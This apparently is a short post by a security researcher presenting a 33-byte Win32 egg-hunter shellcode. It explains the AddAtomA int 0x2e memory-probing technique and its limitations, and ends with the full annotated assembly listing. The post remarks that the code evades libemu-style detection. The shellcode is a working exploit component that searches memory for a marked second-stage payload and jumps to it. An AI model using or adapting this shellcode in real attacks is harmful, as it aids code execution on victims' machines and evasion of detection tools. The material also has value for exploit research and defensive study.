For a current collaboration on taking down yet another botnet, I had to write a very small shellcode. Thanks to some ideas from Understanding Windows Shellcode by skape, I managed to write a egg search shellcode in 33 bytes.
The general idea of the AddAtomA int 2e memory testing was public, but the best implementation I could find was 40 bytes long (skape's one) and had the limitation of an executable marker. This one is 33 bytes long and you can choose any four byte marker you want. If we wouldn't start at 0, we could save two more bytes going down to 31, but this makes search a lot slower. There is a 32 byte version by skape that requires page aligned 2nd stage, which is not really comparable because it again requires an executable marker and a 2nd stage injection of at least 4kb with a long marker sled. Sill I first got the int 2e idea from his paper, so credits to him for that.
The only real limitation of this shellcode is that your second stage may not be within the first four bytes of a page boundary. Theoretical probability is < 0.1%, having heap allocator designs in mind, it is even less probable. If this is a severe stability limitation for you, there is two solutions:
- Use an executable marker and put it in front of the shellcode twice. Usually, it will trigger in the first four bytes and jump into the second marker. If it really is page aligned, it will jump right after the second marker.
- Use any (non-executable) marker and put a second marker with a relative jump to your shellcode after the shellcode.
This shellcode is 100% position independent w/o any GetPC sequence, so it won't be detected by libemu and similiar things (although this wasn't a design goal but just a side effect). The second stage shellcode can also be implemented without any GetPC sequence, as it gets its own address passed in edx.
There is a weird inc ebx instruction at the end of the shellcode, but for a good reason: If this eggsearch shellcode lies in memory before the actual shellcode, our search will stop at the imm32 of the cmp r/m32, imm32 instruction and the jmp edx will go to the next instruction, jne (= jnz) address_loop. The inc ebx ensures that ZF is not set (unless we're very unlucky and our exploitation environment had the otherwise unused ebx register set to 0xffffffff) and thus our search continues at the next address.
; win32 eggsearch shellcode, 33 bytes ; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3 ; (c) 2009 by Georg 'oxff' Wicherski
marker equ 0x1f217767 ; 'gw!x1f'
start: xor edx, edx ; edx = 0, pointer to examined address
address_loop: inc edx ; edx++, try next address
pagestart_check: test dx, 0x0ffc ; are we within the first 4 bytes of a page? jz address_loop ; if so, try next address as previous page might be unreadable ; and the cmp [edx-4], marker might result in a segmentation fault
access_check: push edx ; save across syscall push byte 8 ; eax = 8, syscall nr of AddAtomA pop eax ; ^ int 0x2e ; fire syscall (eax = 8, edx = ptr) cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy) pop edx ;
je address_loop ; jmp if result was 0xc0000005
egg_check: cmp dword [edx-4], marker ; is our egg right before examined address? jne address_loop ; if not, try next address
egg_execute: inc ebx ; make sure, zf is not set jmp edx ; we found our egg at [edx-4], so we can jmp to edx